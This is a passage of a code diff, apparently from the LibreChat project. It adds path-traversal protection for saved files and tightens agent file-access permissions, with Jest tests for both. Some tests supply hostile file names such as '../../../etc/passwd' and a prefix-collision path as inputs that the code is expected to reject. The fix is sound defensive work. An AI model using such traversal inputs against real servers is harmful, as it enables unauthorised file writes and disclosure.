'code-file-id', + apiKey: 'test-key', + toolCallId: 'tool-1', + conversationId: 'conv-1', + messageId: 'msg-1', + session_id: 'session-1', +}; + +describe('processCodeOutput path traversal protection', () => { + beforeEach(() => { + jest.clearAllMocks(); + }); + + test('sanitizeFilename is called with the raw artifact name', async () => { + mockSanitizeFilename.mockReturnValueOnce('output.csv'); + await processCodeOutput({ ...baseParams, name: 'output.csv' }); + expect(mockSanitizeFilename).toHaveBeenCalledWith('output.csv'); + }); + + test('sanitized name is used in saveBuffer fileName', async () => { + mockSanitizeFilename.mockReturnValueOnce('sanitized-name.txt'); + await processCodeOutput({ ...baseParams, name: '../../../tmp/poc.txt' }); + + expect(mockSanitizeFilename).toHaveBeenCalledWith('../../../tmp/poc.txt'); + const call = mockSaveBuffer.mock.calls[0][0]; + expect(call.fileName).toBe('mock-uuid__sanitized-name.txt'); + }); + + test('sanitized name is stored as filename in the file record', async () => { + mockSanitizeFilename.mockReturnValueOnce('safe-output.csv'); + await processCodeOutput({ ...baseParams, name: 'unsafe/../../output.csv' }); + + const fileArg = createFile.mock.calls[0][0]; + expect(fileArg.filename).toBe('safe-output.csv'); + }); + + test('sanitized name is used for image file records', async () => { + const { convertImage } = require('~/server/services/Files/images/convert'); + convertImage.mockResolvedValueOnce({ + filepath: '/images/user123/mock-uuid.webp', + bytes: 100, + }); + + mockSanitizeFilename.mockReturnValueOnce('safe-chart.png'); + await processCodeOutput({ ...baseParams, name: '../../../chart.png' }); + + expect(mockSanitizeFilename).toHaveBeenCalledWith('../../../chart.png'); + const fileArg = createFile.mock.calls[0][0]; + expect(fileArg.filename).toBe('safe-chart.png'); + }); +}); diff --git a/api/server/services/Files/Code/process.js b/api/server/services/Files/Code/process.js index 3f0bfcfc87..e878b00255 100644 --- a/api/server/services/Files/Code/process.js +++ b/api/server/services/Files/Code/process.js @@ -3,7 +3,7 @@ const { v4 } = require('uuid'); const axios = require('axios'); const { logger } = require('@librechat/data-schemas'); const { getCodeBaseURL } = require('@librechat/agents'); -const { logAxiosError, getBasePath } = require('@librechat/api'); +const { logAxiosError, getBasePath, sanitizeFilename } = require('@librechat/api'); const { Tools, megabyte, @@ -146,6 +146,13 @@ const processCodeOutput = async ({ ); } + const safeName = sanitizeFilename(name); + if (safeName !== name) { + logger.warn( + `[processCodeOutput] Filename sanitized: "${name}" -> "${safeName}" | conv=${conversationId}`, + ); + } + if (isImage) { const usage = isUpdate ? (claimed.usage ?? 0) + 1 : 1; const _file = await convertImage(req, buffer, 'high', `${file_id}${fileExt}`); @@ -156,7 +163,7 @@ const processCodeOutput = async ({ file_id, messageId, usage, - filename: name, + filename: safeName, conversationId, user: req.user.id, type: `image/${appConfig.imageOutputType}`, @@ -200,7 +207,7 @@ const processCodeOutput = async ({ ); } - const fileName = `${file_id}__${name}`; + const fileName = `${file_id}__${safeName}`; const filepath = await saveBuffer({ userId: req.user.id, buffer, @@ -213,7 +220,7 @@ const processCodeOutput = async ({ filepath, messageId, object: 'file', - filename: name, + filename: safeName, type: mimeType, conversationId, user: req.user.id, @@ -229,6 +236,11 @@ const processCodeOutput = async ({ await createFile(file, true); return Object.assign(file, { messageId, toolCallId }); } catch (error) { + if (error?.message === 'Path traversal detected in filename') { + logger.warn( + `[processCodeOutput] Path traversal blocked for file "${name}" | conv=${conversationId}`, + ); + } logAxiosError({ message: 'Error downloading/processing code environment file', error, diff --git a/api/server/services/Files/Code/process.spec.js b/api/server/services/Files/Code/process.spec.js index f01a623f90..b89a6c6307 100644 --- a/api/server/services/Files/Code/process.spec.js +++ b/api/server/services/Files/Code/process.spec.js @@ -58,6 +58,7 @@ jest.mock('@librechat/agents', () => ({ jest.mock('@librechat/api', () => ({ logAxiosError: jest.fn(), getBasePath: jest.fn(() => ''), + sanitizeFilename: jest.fn((name) => name), })); // Mock models diff --git a/api/server/services/Files/Local/__tests__/crud-traversal.spec.js b/api/server/services/Files/Local/__tests__/crud-traversal.spec.js new file mode 100644 index 0000000000..57ba221d68 --- /dev/null +++ b/api/server/services/Files/Local/__tests__/crud-traversal.spec.js @@ -0,0 +1,69 @@ +jest.mock('@librechat/api', () => ({ deleteRagFile: jest.fn() })); +jest.mock('@librechat/data-schemas', () => ({ + logger: { warn: jest.fn(), error: jest.fn() }, +})); + +const mockTmpBase = require('fs').mkdtempSync( + require('path').join(require('os').tmpdir(), 'crud-traversal-'), +); + +jest.mock('~/config/paths', () => { + const path = require('path'); + return { + publicPath: path.join(mockTmpBase, 'public'), + uploads: path.join(mockTmpBase, 'uploads'), + }; +}); + +const fs = require('fs'); +const path = require('path'); +const { saveLocalBuffer } = require('../crud'); + +describe('saveLocalBuffer path containment', () => { + beforeAll(() => { + fs.mkdirSync(path.join(mockTmpBase, 'public', 'images'), { recursive: true }); + fs.mkdirSync(path.join(mockTmpBase, 'uploads'), { recursive: true }); + }); + + afterAll(() => { + fs.rmSync(mockTmpBase, { recursive: true, force: true }); + }); + + test('rejects filenames with path traversal sequences', async () => { + await expect( + saveLocalBuffer({ + userId: 'user1', + buffer: Buffer.from('malicious'), + fileName: '../../../etc/passwd', + basePath: 'uploads', + }), + ).rejects.toThrow('Path traversal detected in filename'); + }); + + test('rejects prefix-collision traversal (startsWith bypass)', async () => { + fs.mkdirSync(path.join(mockTmpBase, 'uploads', 'user10'), { recursive: true }); + await expect( + saveLocalBuffer({ + userId: 'user1', + buffer: Buffer.from('malicious'), + fileName: '../user10/evil', + basePath: 'uploads', + }), + ).rejects.toThrow('Path traversal detected in filename'); + }); + + test('allows normal filenames', async () => { + const result = await saveLocalBuffer({ + userId: 'user1', + buffer: Buffer.from('safe content'), + fileName: 'file-id__output.csv', + basePath: 'uploads', + }); + + expect(result).toBe('/uploads/user1/file-id__output.csv'); + + const filePath = path.join(mockTmpBase, 'uploads', 'user1', 'file-id__output.csv'); + expect(fs.existsSync(filePath)).toBe(true); + fs.unlinkSync(filePath); + }); +}); diff --git a/api/server/services/Files/Local/crud.js b/api/server/services/Files/Local/crud.js index 1f38a01f83..c86774d472 100644 --- a/api/server/services/Files/Local/crud.js +++ b/api/server/services/Files/Local/crud.js @@ -78,7 +78,13 @@ async function saveLocalBuffer({ userId, buffer, fileName, basePath = 'images' } fs.mkdirSync(directoryPath, { recursive: true }); } - fs.writeFileSync(path.join(directoryPath, fileName), buffer); + const resolvedDir = path.resolve(directoryPath); + const resolvedPath = path.resolve(resolvedDir, fileName); + const rel = path.relative(resolvedDir, resolvedPath); + if (rel.startsWith('..') || path.isAbsolute(rel) || rel.includes(`..${path.sep}`)) { + throw new Error('Path traversal detected in filename'); + } + fs.writeFileSync(resolvedPath, buffer); const filePath = path.posix.join('/', basePath, userId, fileName); @@ -165,9 +171,8 @@ async function getLocalFileURL({ fileName, basePath = 'images' }) { } /** - * Validates if a given filepath is within a specified subdirectory under a base path. This function constructs - * the expected base path using the base, subfolder, and user id from the request, and then checks if the - * provided filepath starts with this constructed base path. + * Validates that a filepath is strictly contained within a subdirectory under a base path, + * using path.relative to prevent prefix-collision bypasses. * * @param {ServerRequest} req - The request object from Express. It should contain a `user` property with an `id`. * @param {string} base - The base directory path. @@ -180,7 +185,8 @@ async function getLocalFileURL({ fileName, basePath = 'images' }) { const isValidPath = (req, base, subfolder, filepath) => { const normalizedBase = path.resolve(base, subfolder, req.user.id); const normalizedFilepath = path.resolve(filepath); - return normalizedFilepath.startsWith(normalizedBase); + const rel = path.relative(normalizedBase, normalizedFilepath); + return !rel.startsWith('..') && !path.isAbsolute(rel) && !rel.includes(`..${path.sep}`); }; /** diff --git a/api/server/services/Files/permissions.js b/api/server/services/Files/permissions.js index d909afe25a..b9a5d6656f 100644 --- a/api/server/services/Files/permissions.js +++ b/api/server/services/Files/permissions.js @@ -1,10 +1,29 @@ const { logger } = require('@librechat/data-schemas'); -const { PermissionBits, ResourceType } = require('librechat-data-provider'); +const { PermissionBits, ResourceType, isEphemeralAgentId } = require('librechat-data-provider'); const { checkPermission } = require('~/server/services/PermissionService'); const { getAgent } = require('~/models/Agent'); /** - * Checks if a user has access to multiple files through a shared agent (batch operation) + * @param {Object} agent - The agent document (lean) + * @returns {Set} All file IDs attached across all resource types + */ +function getAttachedFileIds(agent) { + const attachedFileIds = new Set(); + if (agent.tool_resources) { + for (const resource of Object.values(agent.tool_resources)) { + if (resource?.file_ids && Array.isArray(resource.file_ids)) { + for (const fileId of resource.file_ids) { + attachedFileIds.add(fileId); + } + } + } + } + return attachedFileIds; +} + +/** + * Checks if a user has access to multiple files through a shared agent (batch operation). + * Access is always scoped to files actually attached to the agent's tool_resources. * @param {Object} params - Parameters object * @param {string} params.userId - The user ID to check access for * @param {string} [params.role] - Optional user role to avoid DB query @@ -16,7 +35,6 @@ const { getAgent } = require('~/models/Agent'); const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDelete }) => { const accessMap = new Map(); - // Initialize all files as no access fileIds.forEach((fileId) => accessMap.set(fileId, false)); try { @@ -26,13 +44,17 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele return accessMap; } - // Check if user is the author - if so, grant access to all files + const attachedFileIds = getAttachedFileIds(agent); + if (agent.author.toString() === userId.toString()) { - fileIds.forEach((fileId) => accessMap.set(fileId, true)); + fileIds.forEach((fileId) => { + if (attachedFileIds.has(fileId)) { + accessMap.set(fileId, true); + } + }); return accessMap; } - // Check if user has at least VIEW permission on the agent const hasViewPermission = await checkPermission({ userId, role, @@ -46,7 +68,6 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele } if (isDelete) { - // Check if user has EDIT permission (which would indicate collaborative access) const hasEditPermission = await checkPermission({ userId, role, @@ -55,23 +76,11 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele requiredPermission: PermissionBits.EDIT, }); - // If user only has VIEW permission, they can't access files - // Only users with EDIT permission or higher can access agent files if (!hasEditPermission) { return accessMap; } } - const attachedFileIds = new Set(); - if (agent.tool_resources) { - for (const [_resourceType, resource] of Object.entries(agent.tool_resources)) { - if (resource?.file_ids && Array.isArray(resource.file_ids)) { - resource.file_ids.forEach((fileId) => attachedFileIds.add(fileId)); - } - } - } - - // Grant access only to files that are attached to this agent fileIds.forEach((fileId) => { if (attachedFileIds.has(fileId)) { accessMap.set(fileId, true); @@ -95,7 +104,7 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele * @returns {Promise>} Filtered array of accessible files */ const filterFilesByAgentAccess = async ({ files, userId, role, agentId }) => { - if (!userId || !agentId || !files || files.length === 0) { + if (!userId || !agentId || !files || files.length === 0 || isEphemeralAgentId(agentId)) { return files; } diff --git a/api/server/services/Files/permissions.spec.js b/api/server/services/Files/permissions.spec.js new file mode 100644 index 0000000000..85e7b2dc5b --- /dev/null +++ b/api/server/services/Files/permissions.spec.js @@ -0,0 +1,409 @@ +jest.mock('@librechat/data-schemas', () => ({ + logger: { error: jest.fn() }, +})); + +jest.mock('~/server/services/PermissionService', () => ({ + checkPermission: jest.fn(), +})); + +jest.mock('~/models/Agent', () => ({ + getAgent: jest.fn(), +})); + +const { logger } = require('@librechat/data-schemas'); +const { Constants, PermissionBits, ResourceType } = require('librechat-data-provider'); +const { checkPermission } = require('~/server/services/PermissionService'); +const { getAgent } = require('~/models/Agent'); +const { filterFilesByAgentAccess, hasAccessToFilesViaAgent } = require('./permissions'); + +const AUTHOR_ID = 'author-user-id'; +const USER_ID = 'viewer-user-id'; +const AGENT_ID = 'agent_test-abc123'; +const AGENT_MONGO_ID = 'mongo-agent-id'; + +function makeFile(file_id, user) { + return { file_id, user, filename: `${file_id}.txt` }; +} + +function makeAgent(overrides = {}) { + return { + _id: AGENT_MONGO_ID, + id: AGENT_ID, + author: AUTHOR_ID, + tool_resources: { + file_search: { file_ids: ['attached-1', 'attached-2'] }, + execute_code: { file_ids: ['attached-3'] }, + }, + ...overrides, + }; +} + +beforeEach(() => { + jest.clearAllMocks(); +}); + +describe('filterFilesByAgentAccess', () => { + describe('early returns (no DB calls)', () => { + it('should return files unfiltered for ephemeral agentId', async () => { + const files = [makeFile('f1', 'other-user')]; + const result = await filterFilesByAgentAccess({ + files, + userId: USER_ID, + agentId: Constants.EPHEMERAL_AGENT_ID, + }); + + expect(result).toBe(files); + expect(getAgent).not.toHaveBeenCalled(); + }); + + it('should return files unfiltered for non-agent_ prefixed agentId', async () => { + const files = [makeFile('f1', 'other-user')]; + const result = await filterFilesByAgentAccess({ + files, + userId: USER_ID, + agentId: 'custom-memory-id', + }); + + expect(result).toBe(files); + expect(getAgent).not.toHaveBeenCalled(); + }); + + it('should return files when userId is missing', async () => { + const files = [makeFile('f1', 'someone')]; + const result = await filterFilesByAgentAccess({ + files, + userId: undefined, + agentId: AGENT_ID, + }); + + expect(result).toBe(files); + expect(getAgent).not.toHaveBeenCalled(); + }); + + it('should return files when agentId is missing', async () => { + const files = [makeFile('f1', 'someone')]; + const result = await filterFilesByAgentAccess({ + files, + userId: USER_ID, + agentId: undefined, + }); + + expect(result).toBe(files); + expect(getAgent).not.toHaveBeenCalled(); + }); + + it('should return empty array when files is empty', async () => { + const result = await filterFilesByAgentAccess({ + files: [], + userId: USER_ID, + agentId: AGENT_ID, + }); + + expect(result).toEqual([]); + expect(getAgent).not.toHaveBeenCalled(); + }); + + it('should return undefined when files is nullish', async () => { + const result = await filterFilesByAgentAccess({ + files: null, + userId: USER_ID, + agentId: AGENT_ID, + }); + + expect(result).toBeNull(); + expect(getAgent).not.toHaveBeenCalled(); + }); + }); + + describe('all files owned by userId', () => { + it('should return all files without calling getAgent', async () => { + const files = [makeFile('f1', USER_ID), makeFile('f2', USER_ID)]; + const result = await filterFilesByAgentAccess({ + files, + userId: USER_ID, + agentId: AGENT_ID, + }); + + expect(result).toEqual(files); + expect(getAgent).not.toHaveBeenCalled(); + }); + }); + + describe('mixed owned and non-owned files', () => { + const ownedFile = makeFile('owned-1', USER_ID); + const sharedFile = makeFile('attached-1', AUTHOR_ID); + const unattachedFile = makeFile('not-attached', AUTHOR_ID); + + it('should return owned + accessible non-owned files when user has VIEW', async () => { + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValue(true); + + const result = await filterFilesByAgentAccess({ + files: [ownedFile, sharedFile, unattachedFile], + userId: USER_ID, + role: 'USER', + agentId: AGENT_ID, + }); + + expect(result).toHaveLength(2); + expect(result.map((f) => f.file_id)).toContain('owned-1'); + expect(result.map((f) => f.file_id)).toContain('attached-1'); + expect(result.map((f) => f.file_id)).not.toContain('not-attached'); + }); + + it('should return only owned files when user lacks VIEW permission', async () => { + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValue(false); + + const result = await filterFilesByAgentAccess({ + files: [ownedFile, sharedFile], + userId: USER_ID, + role: 'USER', + agentId: AGENT_ID, + }); + + expect(result).toEqual([ownedFile]); + }); + + it('should return only owned files when agent is not found', async () => { + getAgent.mockResolvedValue(null); + + const result = await filterFilesByAgentAccess({ + files: [ownedFile, sharedFile], + userId: USER_ID, + agentId: AGENT_ID, + }); + + expect(result).toEqual([ownedFile]); + }); + + it('should return only owned files on DB error (fail-closed)', async () => { + getAgent.mockRejectedValue(new Error('DB connection lost')); + + const result = await filterFilesByAgentAccess({ + files: [ownedFile, sharedFile], + userId: USER_ID, + agentId: AGENT_ID, + }); + + expect(result).toEqual([ownedFile]); + expect(logger.error).toHaveBeenCalled(); + }); + }); + + describe('file with no user field', () => { + it('should treat file as non-owned and run through access check', async () => { + const noUserFile = makeFile('attached-1', undefined); + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValue(true); + + const result = await filterFilesByAgentAccess({ + files: [noUserFile], + userId: USER_ID, + role: 'USER', + agentId: AGENT_ID, + }); + + expect(getAgent).toHaveBeenCalled(); + expect(result).toEqual([noUserFile]); + }); + + it('should exclude file with no user field when not attached to agent', async () => { + const noUserFile = makeFile('not-attached', null); + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValue(true); + + const result = await filterFilesByAgentAccess({ + files: [noUserFile], + userId: USER_ID, + role: 'USER', + agentId: AGENT_ID, + }); + + expect(result).toEqual([]); + }); + }); + + describe('no owned files (all non-owned)', () => { + const file1 = makeFile('attached-1', AUTHOR_ID); + const file2 = makeFile('not-attached', AUTHOR_ID); + + it('should return only attached files when user has VIEW', async () => { + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValue(true); + + const result = await filterFilesByAgentAccess({ + files: [file1, file2], + userId: USER_ID, + role: 'USER', + agentId: AGENT_ID, + }); + + expect(result).toEqual([file1]); + }); + + it('should return empty array when no VIEW permission', async () => { + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValue(false); + + const result = await filterFilesByAgentAccess({ + files: [file1, file2], + userId: USER_ID, + agentId: AGENT_ID, + }); + + expect(result).toEqual([]); + }); + + it('should return empty array when agent not found', async () => { + getAgent.mockResolvedValue(null); + + const result = await filterFilesByAgentAccess({ + files: [file1], + userId: USER_ID, + agentId: AGENT_ID, + }); + + expect(result).toEqual([]); + }); + }); +}); + +describe('hasAccessToFilesViaAgent', () => { + describe('agent not found', () => { + it('should return all-false map', async () => { + getAgent.mockResolvedValue(null); + + const result = await hasAccessToFilesViaAgent({ + userId: USER_ID, + fileIds: ['f1', 'f2'], + agentId: AGENT_ID, + }); + + expect(result.get('f1')).toBe(false); + expect(result.get('f2')).toBe(false); + }); + }); + + describe('author path', () => { + it('should grant access to attached files for the agent author', async () => { + getAgent.mockResolvedValue(makeAgent()); + + const result = await hasAccessToFilesViaAgent({ + userId: AUTHOR_ID, + fileIds: ['attached-1', 'not-attached'], + agentId: AGENT_ID, + }); + + expect(result.get('attached-1')).toBe(true); + expect(result.get('not-attached')).toBe(false); + expect(checkPermission).not.toHaveBeenCalled(); + }); + }); + + describe('VIEW permission path', () => { + it('should grant access to attached files for viewer with VIEW permission', async () => { + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValue(true); + + const result = await hasAccessToFilesViaAgent({ + userId: USER_ID, + role: 'USER', + fileIds: ['attached-1', 'attached-3', 'not-attached'], + agentId: AGENT_ID, + }); + + expect(result.get('attached-1')).toBe(true); + expect(result.get('attached-3')).toBe(true); + expect(result.get('not-attached')).toBe(false); + + expect(checkPermission).toHaveBeenCalledWith({ + userId: USER_ID, + role: 'USER', + resourceType: ResourceType.AGENT, + resourceId: AGENT_MONGO_ID, + requiredPermission: PermissionBits.VIEW, + }); + }); + + it('should deny all when VIEW permission is missing', async () => { + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValue(false); + + const result = await hasAccessToFilesViaAgent({ + userId: USER_ID, + fileIds: ['attached-1'], + agentId: AGENT_ID, + }); + + expect(result.get('attached-1')).toBe(false); + }); + }); + + describe('delete path (EDIT permission required)', () => { + it('should grant access when both VIEW and EDIT pass', async () => { + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValueOnce(true).mockResolvedValueOnce(true); + + const result = await hasAccessToFilesViaAgent({ + userId: USER_ID, + fileIds: ['attached-1'], + agentId: AGENT_ID, + isDelete: true, + }); + + expect(result.get('attached-1')).toBe(true); + expect(checkPermission).toHaveBeenCalledTimes(2); + expect(checkPermission).toHaveBeenLastCalledWith( + expect.objectContaining({ requiredPermission: PermissionBits.EDIT }), + ); + }); + + it('should deny all when VIEW passes but EDIT fails', async () => { + getAgent.mockResolvedValue(makeAgent()); + checkPermission.mockResolvedValueOnce(true).mockResolvedValueOnce(false); + + const result = await hasAccessToFilesViaAgent({ + userId: USER_ID, + fileIds: ['attached-1'], + agentId: AGENT_ID, + isDelete: true, + }); + + expect(result.get('attached-1')).toBe(false); + }); + }); + + describe('error handling', () => { + it('should return all-false map on DB error (fail-closed)', async () => { + getAgent.mockRejectedValue(new Error('connection refused')); + + const result = await hasAccessToFilesViaAgent({ + userId: USER_ID, + fileIds: ['f1', 'f2'], + agentId: AGENT_ID, + }); + + expect(result.get('f1')).toBe(false); + expect(result.get('f2')).toBe(false); + expect(logger.error).toHaveBeenCalledWith( + '[hasAccessToFilesViaAgent] Error checking file access:', + expect.any(Error), + ); + }); + }); + + describe('agent with no tool_resources', () => { + it('should deny all files even for the author', async () => { + getAgent.mockResolvedValue(makeAgent({ tool_resources: undefined })); + + const result = await hasAccessToFilesViaAgent({ + userId: AUTHOR_ID, + fileIds: ['f1'], + agentId: AGENT_ID, + }); + + expect(result.get('f1')).toBe(false); + }); + }); +}); diff --git a/api/server/services/ToolService.js b/api/server/services/ToolService.js index 62499348e6..ca75e7eb4f 100644 --- a/api/server/services/ToolService.js +++ b/api/server/services/ToolService.js @@ -42,6 +42,7 @@ const { } = require('librechat-data-provider'); const { createActionTool, + legacyDomainEncode, decryptMetadata, loadActionSets, domainParser, @@ -64,6 +65,28 @@ const { redactMessage } = require('~/config/parsers'); const { findPluginAuthsByKeys } = require('~/models'); const { getFlowStateManager } = require('~/config'); const { getLogStores } = require('~/cache'); + +const domainSeparatorRegex = new RegExp(actionDomainSeparator, 'g'); + +/** + * Resolves the set of enabled agent capabilities from endpoints config, + * falling back to app-level or default capabilities for ephemeral agents. + * @param {ServerRequest} req + * @param {Object} appConfig + * @param {string} agentId + * @returns {Promise>} + */ +async function resolveAgentCapabilities(req, appConfig, agentId) { + const endpointsConfig = await getEndpointsConfig(req); + let capabilities = new Set(endpointsConfig?.[EModelEndpoint.agents]?.capabilities ?? []); + if (capabilities.size === 0 && isEphemeralAgentId(agentId)) { + capabilities = new Set( + appConfig.endpoints?.[EModelEndpoint.agents]?.capabilities ?? defaultAgentCapabilities, + ); + } + return capabilities; +} + /** * Processes the required actions by calling the appropriate tools and returning the outputs. * @param {OpenAIClient} client - OpenAI or StreamRunManager Client. @@ -152,8 +175,7 @@ async function processRequiredActions(client, requiredActions) { const promises = []; - /** @type {Action[]} */ - let actionSets = []; + let actionSetsData = null; let isActionTool = false; const ActionToolMap = {}; const ActionBuildersMap = {}; @@ -239,9 +261,9 @@ async function processRequiredActions(client, requiredActions) { if (!tool) { // throw new Error(`Tool ${currentAction.tool} not found.`); - // Load all action sets once if not already loaded - if (!actionSets.length) { - actionSets = + if (!actionSetsData) { + /** @type {Action[]} */ + const actionSets = (await loadActionSets({ assistant_id: client.req.body.assistant_id, })) ?? []; @@ -249,11 +271,16 @@ async function processRequiredActions(client, requiredActions) { // Process all action sets once // Map domains to their processed action sets const processedDomains = new Map(); - const domainMap = new Map(); + const domainLookupMap = new Map(); for (const action of actionSets) { const domain = await domainParser(action.metadata.domain, true); - domainMap.set(domain, action); + domainLookupMap.set(domain, domain); + + const legacyDomain = legacyDomainEncode(action.metadata.domain); + if (legacyDomain !== domain) { + domainLookupMap.set(legacyDomain, domain); + } const isDomainAllowed = await isActionDomainAllowed( action.metadata.domain, @@ -308,27 +335,26 @@ async function processRequiredActions(client, requiredActions) { ActionBuildersMap[action.metadata.domain] = requestBuilders; } - // Update actionSets reference to use the domain map - actionSets = { domainMap, processedDomains }; + actionSetsData = { domainLookupMap, processedDomains }; } - // Find the matching domain for this tool let currentDomain = ''; - for (const domain of actionSets.domainMap.keys()) { - if (currentAction.tool.includes(domain)) { - currentDomain = domain; + let matchedKey = ''; + for (const [key, canonical] of actionSetsData.domainLookupMap.entries()) { + if (currentAction.tool.includes(key)) { + currentDomain = canonical; + matchedKey = key; break; } } - if (!currentDomain || !actionSets.processedDomains.has(currentDomain)) { - // TODO: try `function` if no action set is found - // throw new Error(`Tool ${currentAction.tool} not found.`); + if (!currentDomain || !actionSetsData.processedDomains.has(currentDomain)) { continue; } - const { action, requestBuilders, encrypted } = actionSets.processedDomains.get(currentDomain); - const functionName = currentAction.tool.replace(`${actionDelimiter}${currentDomain}`, ''); + const { action, requestBuilders, encrypted } = + actionSetsData.processedDomains.get(currentDomain); + const functionName = currentAction.tool.replace(`${actionDelimiter}${matchedKey}`, ''); const requestBuilder = requestBuilders[functionName]; if (!requestBuilder) { @@ -445,17 +471,11 @@ async function loadToolDefinitionsWrapper({ req, res, agent, streamId = null, to } const appConfig = req.config; - const endpointsConfig = await getEndpointsConfig(req); - let enabledCapabilities = new Set(endpointsConfig?.[EModelEndpoint.agents]?.capabilities ?? []); - - if (enabledCapabilities.size === 0 && isEphemeralAgentId(agent.id)) { - enabledCapabilities = new Set( - appConfig.endpoints?.[EModelEndpoint.agents]?.capabilities ?? defaultAgentCapabilities, - ); - } + const enabledCapabilities = await resolveAgentCapabilities(req, appConfig, agent.id); const checkCapability = (capability) => enabledCapabilities.has(capability); const areToolsEnabled = checkCapability(AgentCapabilities.tools); + const actionsEnabled = checkCapability(AgentCapabilities.actions); const deferredToolsEnabled = checkCapability(AgentCapabilities.deferred_tools); const filteredTools = agent.tools?.filter((tool) => { @@ -468,7 +488,10 @@ async function loadToolDefinitionsWrapper({ req, res, agent, streamId = null, to if (tool === Tools.web_search) { return checkCapability(AgentCapabilities.web_search); } - if (!areToolsEnabled && !tool.includes(actionDelimiter)) { + if (tool.includes(actionDelimiter)) { + return actionsEnabled; + } + if (!areToolsEnabled) { return false; } return true; @@ -569,12 +592,17 @@ async function loadToolDefinitionsWrapper({ req, res, agent, streamId = null, to const definitions = []; const allowedDomains = appConfig?.actions?.allowedDomains; - const domainSeparatorRegex = new RegExp(actionDomainSeparator, 'g'); + const normalizedToolNames = new Set( + actionToolNames.map((n) => n.replace(domainSeparatorRegex, '_')), + ); for (const action of actionSets) { const domain = await domainParser(action.metadata.domain, true); const normalizedDomain = domain.replace(domainSeparatorRegex, '_'); + const legacyDomain = legacyDomainEncode(action.metadata.domain); + const legacyNormalized = legacyDomain.replace(domainSeparatorRegex, '_'); + const isDomainAllowed = await isActionDomainAllowed(action.metadata.domain, allowedDomains); if (!isDomainAllowed) { logger.warn( @@ -594,7 +622,8 @@ async function loadToolDefinitionsWrapper({ req, res, agent, streamId = null, to for (const sig of functionSignatures) { const toolName = `${sig.name}${actionDelimiter}${normalizedDomain}`; - if (!actionToolNames.some((name) => name.replace(domainSeparatorRegex, '_') === toolName)) { + const legacyToolName = `${sig.name}${actionDelimiter}${legacyNormalized}`; + if (!normalizedToolNames.has(toolName) && !normalizedToolNames.has(legacyToolName)) { continue; } @@ -765,6 +794,7 @@ async function loadToolDefinitionsWrapper({ req, res, agent, streamId = null, to toolContextMap, toolDefinitions, hasDeferredTools, + actionsEnabled, }; } @@ -808,14 +838,7 @@ async function loadAgentTools({ } const appConfig = req.config; - const endpointsConfig = await getEndpointsConfig(req); - let enabledCapabilities = new Set(endpointsConfig?.[EModelEndpoint.agents]?.capabilities ?? []); - /** Edge case: use defined/fallback capabilities when the "agents" endpoint is not enabled */ - if (enabledCapabilities.size === 0 && isEphemeralAgentId(agent.id)) { - enabledCapabilities = new Set( - appConfig.endpoints?.[EModelEndpoint.agents]?.capabilities ?? defaultAgentCapabilities, - ); - } + const enabledCapabilities = await resolveAgentCapabilities(req, appConfig, agent.id); const checkCapability = (capability) => { const enabled = enabledCapabilities.has(capability); if (!enabled) { @@ -832,6 +855,7 @@ async function loadAgentTools({ return enabled; }; const areToolsEnabled = checkCapability(AgentCapabilities.tools); + const actionsEnabled = checkCapability(AgentCapabilities.actions); let includesWebSearch = false; const _agentTools = agent.tools?.filter((tool) => { @@ -842,7 +866,9 @@ async function loadAgentTools({ } else if (tool === Tools.web_search) { includesWebSearch = checkCapability(AgentCapabilities.web_search); return includesWebSearch; - } else if (!areToolsEnabled && !tool.includes(actionDelimiter)) { + } else if (tool.includes(actionDelimiter)) { + return actionsEnabled; + } else if (!areToolsEnabled) { return false; } return true; @@ -947,13 +973,15 @@ async function loadAgentTools({ agentTools.push(...additionalTools); - if (!checkCapability(AgentCapabilities.actions)) { + const hasActionTools = _agentTools.some((t) => t.includes(actionDelimiter)); + if (!hasActionTools) { return { toolRegistry, userMCPAuthMap, toolContextMap, toolDefinitions, hasDeferredTools, + actionsEnabled, tools: agentTools, }; } @@ -969,19 +997,22 @@ async function loadAgentTools({ toolContextMap, toolDefinitions, hasDeferredTools, + actionsEnabled, tools: agentTools, }; } - // Process each action set once (validate spec, decrypt metadata) const processedActionSets = new Map(); - const domainMap = new Map(); + const domainLookupMap = new Map(); for (const action of actionSets) { const domain = await domainParser(action.metadata.domain, true); - domainMap.set(domain, action); + domainLookupMap.set(domain, domain); - // Check if domain is allowed (do this once per action set) + const legacyDomain = legacyDomainEncode(action.metadata.domain); + if (legacyDomain !== domain) { + domainLookupMap.set(legacyDomain, domain); + } const isDomainAllowed = await isActionDomainAllowed( action.metadata.domain, appConfig?.actions?.allowedDomains, @@ -1043,11 +1074,12 @@ async function loadAgentTools({ continue; } - // Find the matching domain for this tool let currentDomain = ''; - for (const domain of domainMap.keys()) { - if (toolName.includes(domain)) { - currentDomain = domain; + let matchedKey = ''; + for (const [key, canonical] of domainLookupMap.entries()) { + if (toolName.includes(key)) { + currentDomain = canonical; + matchedKey = key; break; } } @@ -1058,7 +1090,7 @@ async function loadAgentTools({ const { action, encrypted, zodSchemas, requestBuilders, functionSignatures } = processedActionSets.get(currentDomain); - const functionName = toolName.replace(`${actionDelimiter}${currentDomain}`, ''); + const functionName = toolName.replace(`${actionDelimiter}${matchedKey}`, ''); const functionSig = functionSignatures.find((sig) => sig.name === functionName); const requestBuilder = requestBuilders[functionName]; const zodSchema = zodSchemas[functionName]; @@ -1101,6 +1133,7 @@ async function loadAgentTools({ userMCPAuthMap, toolDefinitions, hasDeferredTools, + actionsEnabled, tools: agentTools, }; } @@ -1118,9 +1151,11 @@ async function loadAgentTools({ * @param {AbortSignal} [params.signal] - Abort signal * @param {Object} params.agent - The agent object * @param {string[]} params.toolNames - Names of tools to load + * @param {Map} [params.toolRegistry] - Tool registry * @param 